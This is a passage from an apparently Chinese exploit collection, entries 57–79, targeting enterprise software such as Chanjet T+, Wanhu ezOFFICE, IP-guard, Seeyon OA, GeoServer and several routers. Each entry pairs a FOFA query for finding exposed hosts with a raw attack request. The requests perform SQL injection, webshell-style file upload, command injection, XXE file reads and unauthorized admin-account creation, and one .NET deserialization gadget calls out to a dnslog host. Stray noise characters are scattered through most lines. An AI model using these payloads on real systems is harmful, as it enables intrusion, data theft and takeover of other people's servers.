0 ]* J: C, {2 ?9 }! b* `9 p "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",5 c* e/ p0 t5 h4 g( }
"MethodName":"Start",
6 ?* Z) s$ @$ L+ y. ?" {/ x1 n "ObjectInstance":{. i( {7 ?, N& _ m
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",# G. Q; O, |( s S: v
"StartInfo": { E3 R- ?0 |# p- d7 s
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
% c/ X# u6 a" s* ? "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
# x# H2 \) P" e }* {5 W5 | y& U. ^1 P* k
}
6 U3 U( n5 }0 v, t }
7 ]2 y' V7 f; y}
8 x! ], `* `/ }9 z% M' x( ?0 Q) H8 G9 f6 S* Y% Q# `0 G
: [) _- l3 L M0 f0 x+ W57. 畅捷通T+ keyEdit.aspx SQL注入
0 ~; o# Q+ j6 V# [/ I3 O) QFOFA:app="畅捷通-TPlus"- j2 M+ ~% e( t5 I
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1: ?5 ^% M" Y$ h
Host: host
) j$ I" I, J* ^User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36' p; H* y* D6 B O5 K w4 \
Accept-Charset: utf-8
, x5 z6 H# T0 `% {" \9 A% DAccept-Encoding: gzip, deflate R: M9 L+ d4 ^6 ]- q8 s
Connection: close
! D$ b( L- b [: h, C# o6 M$ I% d$ L4 Z7 m3 y+ J8 ~$ J. {
; Z3 y& x0 p+ F0 G+ y58. 畅捷通T+ KeyInfoList.aspx sql注入
3 p4 i# j* y% EFOFA:app="畅捷通-TPlus"0 Y, T4 a7 k* P4 l
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
2 r. \2 c) {( IHost: your-ip1 z) T6 h0 v1 s' V5 X' b+ }' Q
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 H6 ^1 y# a* O4 M+ X
Accept-Charset: utf-80 T# l/ |$ {0 O( x
Accept-Encoding: gzip, deflate* h2 A* A' H& u" W7 {: q
Connection: close
f% m6 E8 f4 C- E* r3 z
9 I' h# w/ o- l' D" y7 x5 U: \; r; p( _7 d* f& F. a' G" A
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行8 [9 ~& f+ N# e8 L9 ^( _ ~+ o
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
2 w" l" Y0 {+ ]7 [! _& QPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.16 Y# K! ^( \+ ~+ V6 ` _* W1 r
Host: 192.168.86.128:9090. T9 U+ y: U& S; X9 u8 R
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36- Q3 {9 p( W7 P4 b2 w9 y( W
Connection: close
; |0 L: B6 _0 F; L# F" P6 v5 m+ yContent-Length: 1669$ _$ P9 C- Z& q: F- f& M2 y, {
Accept: */*" K% N0 m% V9 I
Accept-Language: en
( w5 E0 H- C5 p2 H4 S; o; {Content-Type: application/x-www-form-urlencoded& u% o D& m c1 Y! V. F
Accept-Encoding: gzip
* i9 g2 B9 P, S1 [9 Q8 _* {
* l7 P6 h+ |+ y8 z: `; ]PAYLOAD& d0 ]" p! ^1 @0 N- o/ M
" [: u5 |* h: x0 @( O8 ^, v3 ]
) f( Y) O% U# o: I3 E9 C! R60. 百卓Smart管理平台 importexport.php SQL注入/ y' E$ G& c& N. s( _& s
FOFA:title="Smart管理平台"
, U* Y: `1 D$ ^- a5 XGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
" d/ y' C( I. L4 [Host:
+ ]: L( ^5 h1 D) tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 C# [! s: F/ {: iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% z5 e* r1 M# C8 X! @
Accept-Encoding: gzip, deflate
1 Y% S/ x, o3 }( Y$ f6 tAccept-Language: zh-CN,zh;q=0.9
8 n8 n+ e# i+ h2 l$ m/ NConnection: close
% ]& E3 m1 ]% Q; ]
6 _# a# r+ ]* ~1 ^& a: }- B7 `. _' O! K% Q2 g! R1 t7 l
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传; d3 q; W1 Y4 n4 X7 w
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
p6 ^# L/ I. H5 Y2 EPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
/ g: A. d9 H, f4 D% |9 sHost: x.x.x.x; F8 k0 ^# {. o7 ?6 q1 q2 D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 l: M9 Z0 _/ ^8 L
Connection: close) M2 r: x* C1 ?) J( d- n( {
Content-Length: 27
7 B$ Q" S/ Z- r% a5 G! K0 D ~Accept: */*
% h5 K; j: W, t1 tAccept-Encoding: gzip, deflate: w3 y6 m8 _+ q7 h: |" d
Accept-Language: en
5 m; k5 a% {* q: EContent-Type: application/x-www-form-urlencoded) \% L) P3 ` G( S' }, J2 e! Y
# O( @* r$ h- ]8uxssX66eqrqtKObcVa0kid98xa
0 A% Q# I7 _* x, {3 G3 a' |! n: {
M! w/ L5 M, ]8 R. v7 E! Z62. IP-guard WebServer 远程命令执行
% H, A& f# P+ z& A+ g2 d4 {FOFA:"IP-guard" && icon_hash="2030860561"4 p& l" D1 t X( N8 R" C
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
6 p1 _6 D$ R8 O4 B$ E# r* { A/ p" wHost: x.x.x.x! N+ s: {) x& a/ O& n( }
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.369 _5 b: E# `" m! o1 p7 R( w, {' L
Connection: close
7 j; L( L% v! T/ x* pAccept: */*2 e/ s' ~" h& c: Q8 p9 Q
Accept-Language: en
- e! I8 N2 n6 {Accept-Encoding: gzip: G; `/ v% K0 L* R2 ?
0 k* b+ c0 h" R
9 c+ G% j$ c7 m% I1 Z6 R3 W4 G
访问$ h9 V7 S u4 T' X9 t
% k) k N. d: [# p% u9 P# n0 J
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.11 Q! l; t6 t/ p$ O/ x
Host: x.x.x.x* U1 @( ]: I% m, [5 u
/ ?1 K1 ?& b: Q( U; G: M
8 b- N1 c/ X% v4 s& }& b63. IP-guard WebServer任意文件读取
" }8 B) ]" I H. gIP-guard < 4.82.0609.0
Q. E" r! K; y% ?FOFA:icon_hash="2030860561"
1 A! @" K- @0 }: rPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1" w" @% C" i! q( f% r0 {
Host: your-ip
9 M N4 t/ p/ pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 o* r7 S8 o* Q7 OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 v# @ Z8 y) O) _
Accept-Encoding: gzip, deflate
+ V6 q: O3 F: S: AAccept-Language: zh-CN,zh;q=0.9: A. |0 `6 Z. j& C3 t
Connection: close# @ h5 @2 x9 v$ S3 k
Content-Type: application/x-www-form-urlencoded/ d8 z) B0 ~6 v6 I+ h Q; G
7 A* X: f" u8 q& _path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
8 u- i4 w* P9 m. Y7 c
! J3 L6 b- v4 g% l, ^& F6 ^64. 捷诚管理信息系统CWSFinanceCommon SQL注入
3 A0 ^( g/ ?8 x5 N1 s' h# AFOFA:body="/Scripts/EnjoyMsg.js"
5 g( ]7 ]: }' k% W- \% g( u8 RPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
5 r+ R# o, Q+ y, R6 mHost: 192.168.86.128:9001! s7 e# r- \& Y) [- M; g# ^7 j+ t
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36/ J7 C9 T) f& |( w- b, Q( k
Connection: close
4 ~/ q* P" c! u! Z: p6 DContent-Length: 369$ a! ~7 }* y! j3 F3 B& i) S* T
Accept: */*# ?" G5 P4 D9 r' I
Accept-Language: en
! ^' C. Y5 W0 X& u& X' D( F. ~Content-Type: text/xml; charset=utf-8
& K; A! P5 D/ d" D( Q% ?: \- U+ RAccept-Encoding: gzip
* l9 ?5 N8 B. U& g9 c
1 O5 V* [7 [, o<?xml version="1.0" encoding="utf-8"?>
% c7 o$ M+ h& O/ m4 L2 ~) k) H: [<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">8 Q) A9 b. f$ P* p8 Q
<soap:Body>+ ?. a0 |+ }' I
<GetOSpById xmlns="http://tempuri.org/">
- a( t% p8 j* `9 q; r9 L9 j3 l <sId>1';waitfor delay '0:0:5'--+</sId>; k& T( K; l9 `' q+ p7 n
</GetOSpById>
3 y0 o2 A' P: ]- o </soap:Body>
7 R$ N+ F9 h7 E+ ~' m, }</soap:Envelope>( W5 Z/ [7 f9 [) g, d, D+ d
" O4 l. ]$ z: {
. |! b8 e9 W6 |. N. x& P
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过/ f" W# B% Z1 F! N
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"5 a3 V7 [0 T/ f; `; `, v; k& I
响应200即成功创建账号test123456/123456
/ j9 t: _ y+ GPOST /SystemMng.ashx HTTP/1.1; M) ?- { b0 b2 b4 j8 D
Host:+ C( r" \: E! U+ Y7 L
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)7 O" d6 H4 o! m5 ^0 Q: b% J
Accept-Encoding: gzip, deflate
7 N$ v# Y7 q+ n' j7 B& Q9 `Accept: */*
2 u2 B5 x# k% M, C$ {Connection: close
! U& N8 a) m6 _& t+ ^+ q" h W+ Q6 FAccept-Language: en
& J* w& s) @3 w6 c8 p2 F/ TContent-Length: 174( I! h! a5 z6 u( {' A
% N. Y) _: Z( NoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
$ I. S9 [, m: t" E6 D0 T3 @; ~6 h
r: x4 E1 m8 t6 h. V7 M8 H7 D8 T9 a7 L; s
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入) c7 n& J* g" G3 z2 N; j4 e
FOFA:app="万户ezOFFICE协同管理平台"
, n, Z* V( W: J S
4 Z' m9 [% H4 Q/ }" W5 |" HGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1* z& X; j# ]: H* t! m! H
Host: x.x.x.x
; C5 K) |) D) Q; U) r& ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
5 q/ A6 I* k' z+ aConnection: close
" ^2 E! L0 }2 [# pAccept: */*: v% H3 z. L, Y" ]/ w6 g/ O' y2 q
Accept-Language: en
2 l r: c" {" W9 UAccept-Encoding: gzip
* G% W- m( Z0 f5 r) x
) N7 U( z7 x$ @3 Y" o
; U* J% ]0 p( Y% j" T: v) t7 f第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在( L( j: E2 u* _5 b7 Q
# h, R8 ^0 k( N9 S1 u0 p2 P4 W/ r
67. 万户ezOFFICE wpsservlet任意文件上传, _; C6 Z6 p% [2 V
FOFA:app="万户网络-ezOFFICE"
- Y5 K# e, w( g2 o9 DnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
$ Q4 V9 P% \$ t8 K6 J2 ~6 N: @POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
7 e* {4 B; ]2 kHost: x.x.x.x
5 X) } a' G, t/ dUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0+ k: f- k' @5 |7 l
Content-Length: 173
l# f* v; w3 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
0 h- D% X0 T( Q9 R: P8 ~Accept-Encoding: gzip, deflate( H* |8 }9 P* W- X/ D
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+ s; J5 O$ |" s, m! ~Connection: close3 n2 o7 |" R- ]; \7 f2 r. F
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
9 L! ]/ e- q# _' G& u$ W0 QDNT: 1* H* j0 i+ D' F# i/ x/ Y- s% M
Upgrade-Insecure-Requests: 1
% w: h$ E6 g. K0 Q! U* @. P* U5 J _ X3 z
--ufuadpxathqvxfqnuyuqaozvseiueerp {( {1 L$ ^: r+ {9 M- X
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"0 J! h6 p- [; I; j9 R
9 s9 }" E( _$ P# ?, Q: J) i# b<% out.print("sasdfghjkj");%>
/ C9 t- d- v, Q--ufuadpxathqvxfqnuyuqaozvseiueerp--
" y: x, h5 L% z0 ^) `# i! j B1 Q4 z% n) `" n
2 p; Q) r2 } M! I* J1 S
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp5 ~, K8 v8 i1 \2 I9 _
+ W/ A$ U7 j& x3 d/ @
68. 万户ezOFFICE wf_printnum.jsp SQL注入
0 |& S* ]. b m( uFOFA:app="万户ezOFFICE协同管理平台"% m+ ?8 `( p8 b
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" X! \/ L: W4 g
Host: {{host}}
" y. X( N& C' }) GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36. j/ _, A# |/ o+ L8 k8 ]) p
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
7 Z: K& }/ s, T( p; TAccept-Encoding: gzip, deflate3 C! @' T% y6 Q/ j4 t! }
Accept-Language: zh-CN,zh;q=0.9. ?% {8 o: G2 h0 X' L
Connection: close
" s) f4 ~+ H6 }) q q( ]% [5 v7 ^9 J2 C P
' I9 [8 x0 f* ^4 r
69. 万户 ezOFFICE contract_gd.jsp SQL注入
3 C- j5 `8 b- M3 {) w' oFOFA:app="万户ezOFFICE协同管理平台"$ i9 ? h. i( Z" `/ z+ C- t
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
. ~, n1 `4 U( j% x9 tHost: your-ip8 ~, n- W: S: w6 \- ^
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
' a2 O9 f7 O+ u1 G# ~" j6 FAccept-Encoding: gzip, deflate
4 k2 u" p. V g4 Q& w0 Z/ SAccept: */*/ k% i( u( T& S1 V' v$ }3 P4 Z
Connection: keep-alive/ S. Q0 N) j! ]# k) T
* W6 r# A' l- q/ H
3 P. d1 \, P. s# Q% c
70. 万户ezEIP success 命令执行
& h" E+ o. T% |FOFA:app="万户网络-ezEIP"4 v) t% h: G# ]& m8 t" l
POST /member/success.aspx HTTP/1.1
# l* `- F! i' ~) rHost: {{Hostname}}6 w/ N, p# G/ i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
9 T3 b8 c6 l S, J% @SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
7 t) w& R9 J& A8 oContent-Type: application/x-www-form-urlencoded! A$ d# h" D/ J
TYPE: C
+ m$ q) W" a6 {' \Content-Length: 16702' F! S/ I+ Y. ^( [1 |' `
$ l6 r% B7 L% w3 o$ Q, v__VIEWSTATE=PAYLOAD! d' _* {$ `. V2 C* [3 a3 }
; f- G: H" f! e/ z" b: |
/ T6 y3 x* h: `) }0 g71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
2 N w; W2 z' |/ O- x) NFOFA:body="PM2项目管理系统BS版增强工具.zip": P/ P$ H" l3 K( V6 m8 R% B& @
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
9 I; V% p1 Q& k) FHost: x.x.x.xx.x.x.x- ?/ p6 j* T/ U# n$ z5 q8 T
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
* b5 d" ^) H0 {& [+ A: t( f0 g bConnection: close! J/ L" J0 U& T: }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! I- c- r% _- S4 }# J
Accept-Encoding: gzip, deflate
/ d L' W% \& ]& I: w) n6 F/ N& r( KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 C' d. r6 l' `1 Z4 C
Upgrade-Insecure-Requests: 1* j/ d8 @1 }% G: l- B( P- L
# G, i" I6 Y* m: [4 U( [9 E; y5 w T/ c! D+ I1 G
72. 致远OA getAjaxDataServlet XXE
. P0 N2 H E( @. XFOFA:app="致远互联-OA"
$ h- w$ `( B5 ?4 f/ f; l& LPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
9 c+ |7 w# l$ j. F- M+ bHost: 192.168.40.131:8099
G4 N& j8 M8 kUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.365 f: J4 W. |* ?+ Z
Connection: close
c2 P; s& ^1 e8 M" V: R5 [( qContent-Length: 583
2 e7 x! T2 @( c9 M! X. lContent-Type: application/x-www-form-urlencoded& @- _8 Y9 C+ c: O
Accept-Encoding: gzip* a! {! b8 E# a0 D! \7 U
' B7 U2 @2 N% M& B1 X0 T6 c0 LS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E( U' }8 H4 W2 f1 y6 r$ \& @
7 g( p- F: N0 ?9 I4 a' y) Z `
9 N6 P' i- Z) d, J- D6 g* T- k
73. GeoServer wms远程代码执行
( s2 l! a8 x% x8 ~% mFOFA:icon_hash=”97540678”
7 V' b: N* n( ?/ lPOST /geoserver/wms HTTP/1.1
& V4 o* u" O l2 }* THost:
0 t2 f( a3 A4 l( n+ D; ?; rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
/ ^& m, b5 }6 y3 ^Content-Length: 19810 x- k# P& t7 I7 d8 U
Accept-Encoding: gzip, deflate- C! K) l; U4 R. s0 S& Q
Connection: close* x% {2 H9 j- H
Content-Type: application/xml D3 Y) }3 v) U: Q8 x$ X0 D$ j
SL-CE-SUID: 3, j/ D1 P8 q. Y
7 e6 V) v$ Q% v' E3 Q- u" l
PAYLOAD& @& C4 O& g- q+ Y" p: h6 v6 c: m
. e( y |& A$ M. h4 P* t$ @! |
7 z4 E; u0 l7 n2 b
74. 致远M3-server 6_1sp1 反序列化RCE( K) |- P% K+ L* V
FOFA:title="M3-Server"
- j! p. G) {7 A# m+ ^PAYLOAD
# J5 L" C4 k2 W* j* b
" Q- F; o; j4 D" `7 N4 r0 @% b( p75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE! \6 {( I1 `& `3 _1 g$ P
FOFA:app="TELESQUARE-TLR-2005KSH"
: q# \1 P; L+ kGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
- }% y- P% w" ?) I% |; m& LHost: x.x.x.x" \7 V& K0 _$ Q8 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# V8 x( E0 e$ u5 x7 F
Connection: close
* ]. w/ s7 ~+ |, H6 HAccept: */*6 _0 g- E8 i$ J# L) E' O
Accept-Language: en
5 ]2 Q; u* k# w$ V7 L gAccept-Encoding: gzip
$ k0 u) b! z/ d3 Q! E! } L+ ]6 E3 P
' t/ s4 ]8 b( M3 O5 W0 q
GET /cgi-bin/test28256.txt HTTP/1.12 s: c" ]/ s+ G
Host: x.x.x.x: d! V2 ~; }" m3 ]7 `0 n8 `
" Z# b5 V9 V- N6 ~- Y; f. O
* r8 \8 W6 J( j7 |) n5 K+ Z& R
76. 新开普掌上校园服务管理平台service.action远程命令执行0 i9 ]( e) ^- z+ [
FOFA:title="掌上校园服务管理平台"
, f2 n+ L! N: aPOST /service_transport/service.action HTTP/1.1
5 G. k$ J' J' A T0 Y: _7 [Host: x.x.x.x
9 {% O: l! d, P8 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
1 |0 U, @& _7 D p+ oConnection: close
) f( T2 w, H0 k2 w5 V# P+ X, n) OContent-Length: 2110 a0 T7 g8 Q3 d, ~* y8 y* r1 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* M' f3 [ w B3 |Accept-Encoding: gzip, deflate) `4 L& I7 M* \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 {$ r) |% v! x0 W1 a% LCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4 n1 l6 _. \' h6 B' z
Upgrade-Insecure-Requests: 1
! g* G; d) X6 R k! q0 T' W/ d4 U( c/ v
{
2 s" j( P% _* D5 P/ o2 _# |. o"command": "GetFZinfo",
" ~9 j& J; h- s m3 p "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"# K6 I" a5 `* `+ S# \+ d
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
, V K+ v$ K$ q, M2 h}; ^1 {. }2 Y5 w3 _' @
$ [& I. X6 {" R: S% M6 @- q! x* ?9 D3 h+ ] T
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.12 Q- X u1 V% R; p1 ` b
Host: x.x.x.x
! y* J" V! D( ~& e! \7 W: }( M6 R" w2 u. B/ e# r
( Q* f7 e- h+ @) G
! }! E, }2 h% C1 c6 K# a
77. F22服装管理软件系统UploadHandler.ashx任意文件上传+ [* @" a$ L- p. ^
FOFA:body="F22WEB登陆"
& G3 Z+ x& O- kPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
" {) D2 X! Q' _- X2 B0 g6 hHost: x.x.x.x0 ]; O: G) T4 s/ j! L, p! X; U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.367 r. j* W7 e- ~0 i- G L* k; m7 O
Connection: close& f) f( e9 S, B# {6 L: w' Z( l
Content-Length: 433
! a! B; y. S/ i$ JAccept: */*
8 e, |! x. W2 P& G9 TAccept-Encoding: gzip, deflate0 |! I/ r. e h0 z! h
Accept-Language: zh-CN,zh;q=0.9
# ` S1 W8 @5 S5 VContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix: Y, o3 e& i2 t% B! c) e
9 t3 I0 o/ J$ u: a
------------398jnjVTTlDVXHlE7yYnfwBoix
: r& q& k0 ~4 ^8 |* C" vContent-Disposition: form-data; name="folder"
$ J2 A. O9 U% x! |# V7 @* P3 i* @' q$ J5 ]
/upload/udplog+ P" l1 b" z# H j
------------398jnjVTTlDVXHlE7yYnfwBoix
- i1 Z. e$ ]9 o4 U$ L8 |2 @, M" d, TContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
( J+ [$ ~$ o. A4 y2 @) p$ A0 QContent-Type: application/octet-stream
e: z, a( i2 O* M( \& k4 ]) @, o2 f5 \7 _
hello1234567
0 _6 ]3 L9 t3 ~2 m% W+ @7 c------------398jnjVTTlDVXHlE7yYnfwBoix
q; x( w$ a. g/ Q- C% k2 G8 _3 wContent-Disposition: form-data; name="Upload"
' {; Q. i4 o! y' g, \, N1 Y4 X5 D z7 Y
Submit Query
! x& }; G# f$ C+ A2 O# c------------398jnjVTTlDVXHlE7yYnfwBoix--8 |8 V$ o9 l2 o- c7 a
: R! Q' u+ L5 L# c9 S: w
8 h" b1 |. p8 ^& k/ n7 N* b78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
; \3 T y2 c, M1 X2 {FOFA:icon_hash="2001627082"
6 a7 ~4 y; a0 u. V* l2 { N5 APOST /Platform/System/FileUpload.ashx HTTP/1.1
% F5 j; |. U8 t$ u; QHost: x.x.x.x
4 X0 K! G' v5 x3 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 j0 r7 x" A0 I/ ?4 k1 g3 _/ \Connection: close
7 K7 M1 ~) Y) {6 ]+ t4 QContent-Length: 336
: P. {" K$ ?$ A. S pAccept-Encoding: gzip" ~% M+ b) I7 G
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l8 \; Q8 a" ]( B/ O/ |! y% D7 A1 g
% p1 _! |' W5 t% e5 p4 ]------YsOxWxSvj1KyZow1PTsh98fdu6l
+ K) V: ~4 H# M2 i) rContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
! j6 N- v& T( R7 P. eContent-Type: image/png2 X9 ^# ?- y" ]6 E7 X2 G" q
+ y7 O$ L* T2 G7 ~
YsOxWxSvj1KyZow1PTsh98fdu6l2 o% ~9 H' d+ L i/ i9 `
------YsOxWxSvj1KyZow1PTsh98fdu6l( x P$ [# v; g& R% j- a4 p
Content-Disposition: form-data; name="target"/ m1 J+ T( A2 O* S) q1 a
: c% @' _ H8 u% Y( j/ B/Applications/SkillDevelopAndEHS/
% K6 u& X( p0 H# m3 J. v------YsOxWxSvj1KyZow1PTsh98fdu6l--
6 [8 N6 b c, V k
4 p" O7 r* h2 K# e: q( s$ n2 K9 g
5 W. Y* N2 _' Y5 S3 P5 pGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1! h4 U% w G1 n, k6 l' V6 a
Host: x.x.x.x
6 o/ r7 R8 i6 S7 J* c, v( B0 c1 W
# U. P S9 O' ~- r4 q6 X# H0 e/ z' @- H, c/ \/ i. t
79. BYTEVALUE 百为流控路由器远程命令执行& t5 t5 ^# f( W1 W8 [$ a9 O+ i
